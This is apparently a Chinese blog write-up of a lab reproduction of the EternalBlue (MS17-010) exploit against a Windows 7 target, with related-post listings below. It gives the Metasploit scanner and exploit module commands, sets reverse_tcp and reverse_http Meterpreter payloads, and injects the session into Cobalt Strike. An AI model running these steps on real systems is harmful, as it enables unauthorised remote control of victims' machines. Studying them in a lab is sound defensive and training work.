永恒之蓝ms17-010复现并转移会话到CobaltStrike

最新推荐文章于 2024-05-23 09:35:56 发布
最新推荐文章于 2024-05-23 09:35:56 发布
阅读量967 收藏 2
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x0916/article/details/125177019
版权

一、复现环境

kali攻击机ip:192.168.10.130

靶机windows7x64,关闭防火墙,ip:192.168.10.133

说明:这里靶机需要注意一下需要64位,之前使用xp32位做的没有成功

二、复现过程

打开kali自带的MSF

msfconsole

扫描一下靶机开放的端口

可以看到开放了445端口,永恒之蓝就是利用了445端口

搜索一下ms17-010漏洞

search ms17-010

exploit为攻击模块,auxiliary为辅助扫描模块

先用auxiliary辅助扫描看一下是否存在永恒之蓝漏洞,如果有再去使用攻击模块攻击

use auxiliary/scanner/smb/smb_ms17_010

 可以看到已经进入模块下

options命令可以查看需要配置的参数

Required下面的yes对应的是必填的 选项

RHOST为靶机IP地址

RPORT为要攻击的端口,这里默认445,不需要配置

接下来就要配置参数了

 可以看到极大可能存在MS17-010漏洞,并猜测了靶机对应的版本

进入攻击模块

use exploit/windows/smb/ms17_010_eternalblue

会显示没有payload,但它默认给你添加上了

以防万一我们再添加一边payload熟悉一下操作

set payload windows/x64/meterpreter/reverse_tcp

 利用show payloads命令可以查看当下漏洞利用模块下可用的所有payload

进行攻击

 攻击成功后建立了session

  background  退回模块下

sessions -i  查看会话信息

session的id号为2

三、会话转移

打开CobaltStrike设置监听

 

use exploit/windows/local/payload_inject

  使用该模块可以将 Metasploit 获取到的会话注入到CS中。

 

配置payload

set payload windows/meterpreter/reverse_http

 

配置端口,端口为CobaltStrike自己设置监听的端口

 

 运行

 

这时CS中会出现转移的会话

 参考文章:永恒之蓝漏洞复现(ms17-010)_flyhite的博客-CSDN博客_ms17-010

 

 

 

 ,

 

xxxxxvxxxxx
关注
复现永恒之蓝ms17-010漏洞笔记
x202231的博客
11-01 838
在渗透电脑的路上有很多人不知道该怎么做不知道到底对不对,那么本章就介绍利用永恒之蓝漏洞去渗透一台win7的电脑。这个漏洞算是比较常见的漏洞也是非常的好用具体后面的可以参考其他的博客文章。
永恒之蓝 MS17-010漏洞复现超级详细(虽然最后一步复现失败)
qq_44768719的博客
11-08 6818
一:漏洞原理 1:简介 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。 二、漏洞复现 准备: 一台关掉了防火墙的的win7(IP地址为192.168.1.101) 一台kalI 开始操作: 信息收集: 用nmap去扫描目标机的端口开启情况: nmap -sS -sV 192.168.1.101 这时候在发现445端口开启,这正是永恒之蓝利用的必备条件,且版本为win7-10 这时候我们可以利用msf去加载exp去利用 2.打开m
Cobalt Strike DLL用于永恒之蓝注入
46的十哥哥的5哥哥
02-05 2339
来自:5号黯区 5号黯区是一支致力于红队攻防研究与培训的团队,官网:http://www.dark5.net 我们在对存在MS17010的漏洞主机进行DLL注入的时候,一般都是用的Meataploit的msfvenom生成出来的,所以每次上线之后基本都是要经过相对比较繁琐的操作之后转到Cobalt Strike去,这样就会显得非常麻烦。 所以可以使用metasploit的msfvenom来...
推荐开源项目:Cobaltstrike Aggressor Script - MS17-010 攻击与扫描工具
最新发布
gitblog_00068的博客
05-23 434
推荐开源项目:Cobaltstrike Aggressor Script - MS17-010 攻击与扫描工具 项目地址:https://gitcode.com/phink-team/Cobaltstrike-MS17-010 1、项目介绍 在网络安全领域,有效的漏洞利用和安全扫描是防御者与攻击者之间的关键对决点。Cobaltstrike Aggressor Script 是一款专为Cobalts...
Cobalt Strike 会话管理
yyj1781572的博客
11-17 451
Cobalt Strike 会话管理
内网安全Cobalt Strike 与 MSF 联动( 会话 相互转移
网络安全领域___专研者.
06-14 4154
在渗透中,有时候Cobalt Strike会话可能会受限制,所以我们需要把 Cobalt Strike会话转移到 MSF 上进行后面的渗透。也有的时候会话在 MSF 上,但是我们需要操作更简便 或者 展示力更好,所以我们会把 MSF 上的会话转移Cobalt Strike 上进行后面的渗透.
永恒之蓝 MS17-010 漏洞复现
Nobug_的博客
06-16 873
永恒之蓝 MS17-010 漏洞复现 文章目录永恒之蓝 MS17-010 漏洞复现前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.
网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现
weixin_42474227的博客
12-30 9620
永恒之蓝 MS17-010漏洞复现 学好网络安全,保护自己,保护家人
Aggressor:Ladon for Cobalt Strike、大型网络渗透扫描器、漏洞利用检测 MS17010 passwordbrute-forcepsexecatexecsshexecwebshel​​lsmbexecnetcatosscannetscanstruts2PocweblogicExp
05-31
Ladon for Cobalt Strike Ladon For Cobalt Strike Ladon 7.7 For Cobalt Strike 中文GUI 信息收集/存活主机/服务识别/端口扫描 高危漏洞检测 网络服务密码爆破 远程执行/横向移动 MSF、NC联动/一键反弹 程序简介 Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。7.0版本内置83个功能模块,外部模块18个,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat
MS17-010 ——永恒之蓝漏洞利用
迷风小白
06-20 6811
永恒之蓝”的原理主要是扫描所有开放445文件共享端口的Windows机器,利用Windows系统的SMB漏洞可以获取系最高权限。 影响范围:Windows Vista、Win7、Win8、Win XP、Windows server 2003等。 防范措施:及时更新Windows系统补丁,不要打开陌生的文件。 环境: 攻击机:kali IP:192.168.137.44 靶机:win7 IP...
CobaltStrike视频教程
binjiao4449的博客
08-06 473
课程大纲第一章:介绍与安装介绍与安装第二章:payload 应用创建监听及生成 payloadoffice 宏 payload 应用https payload 应用搜集目标基本信息网页挂马应用钓鱼页面应用批量发送钓鱼邮件第三章:免杀应用使用 c# 免杀使用 powershell 免杀使用 hanzoInjection 免杀使用 veil 免杀第四章:内网***应用beacon...
CS使用+后渗透
2302_79348448的博客
08-16 519
使用了C/S架构,它分为客户端和服务端,服务端只要一个,客户端可有多个,多人 连接服务端后可协同测试,与其他人分享shell。此时将木马放入win7中,可以利用之前所写的ms17-010永恒之蓝)漏洞,使用upload命令将木马文件上传win7桌面。右键点击上线的靶机,然后在session(会话操作)里面将,sleep(回连间隔)的参数改为0。Windows里面,转到中途站主机上,如果木马不见了的话,是因为防火墙自动杀掉了,将木马放到靶机win7中,放入之后,双击木马,之后CS会提示上线。
红队实战之VulStack-1
A_991128a的博客
08-14 255
这是我第二次做该靶场,第一次做的时候只采用了凭证传递的利用方式,并没有考虑 MS17-010漏洞利用,也没有采用隧道的方式来访问内网,经过这些天的考虑后我决定重做温习一遍,一是重新整理一下思路;二是锻炼一下内网渗透思路。当然在练习过程中我也遇到了许多问题,比如certutil.exe 怎么无法在 Windows Server 2003 中传递保存木马文件、FTP匿名登录漏洞如何通过代理登录利用等,显然这些问题在打靶记录中未直接体现。但它们对渗透思路的打磨有很大帮助。
永恒之蓝上线CS
黑战士的博客
04-20 707
该文介绍了在内网环境下,利用永恒之蓝漏洞(EternalBlue)将攻击者控制台(CS)上线的方法。前提条件是目标机器可上网、无防火墙和杀毒软件,并且存在永恒之蓝漏洞。使用Erebus插件的eterblue功能,通过MSF生成DLL文件,再利用永恒之蓝漏洞注入到目标系统中。文中给出了MSF生成不同平台DLL的命令,并详细说明了如何替换CS工具中的DLL文件,最后展示了在Double中选择目标IP和系统位数进行攻击,成功上线CS的截图。
内网渗透之Vulnstack4靶场的全方位打法
xf555er的博客
12-29 1663
MS14-068是一个著名的Windows Kerberos安全漏洞,允许攻击者篡改Kerberos票据,从而获取非法提权。这个漏洞特别影响Windows域控制器,能让攻击者伪造Kerberos票据,获取域内几乎任意账户的权限,包括域管理员权限。这使得攻击者可以在网络中随意访问和控制资源。
永恒之蓝ms17_010漏洞复现实验
01-03
很抱歉,根据提供的引用内容,我无法提供关于永恒之蓝MS17-010漏洞的复现实验。这是因为复现该漏洞需要特定的环境和设备,并且涉及到非法活动。我强烈建议您不要尝试复现该漏洞,以免违法和造成不必要的损失。 如果您对网络安全感兴趣,我可以为您提供一些关于网络安全的基础知识和防护措施。请问您对此感兴趣吗?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值